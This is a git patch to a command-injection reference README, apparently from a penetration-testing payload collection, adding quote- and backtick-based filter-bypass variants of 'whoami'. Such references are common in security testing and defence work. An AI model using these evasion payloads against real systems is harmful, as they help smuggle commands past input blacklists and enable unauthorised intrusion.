From 033982dc30af28a383dcc3ef8a647abc132f4c34 Mon Sep 17 00:00:00 2001 From: xplo1t-sec Date: Sat, 9 Mar 2024 21:46:33 +0530 Subject: [PATCH] bypass techniques added --- Command Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index 7eefd89d8c..d0ce9cdecb 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -18,6 +18,7 @@ * [Bypass blacklisted words](#bypass-blacklisted-words) * [Bypass with single quote](#bypass-with-single-quote) * [Bypass with double quote](#bypass-with-double-quote) + * [Bypass with backticks](#bypass-with-backticks) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with $@](#bypass-with-) * [Bypass with $()](#bypass-with--1) @@ -245,12 +246,20 @@ root:x:0:0:root:/root:/bin/bash ```powershell w'h'o'am'i +wh''oami ``` #### Bypass with double quote ```powershell w"h"o"am"i +wh""oami +``` + +#### Bypass with backticks + +```powershell +wh``oami ``` #### Bypass with backslash and slash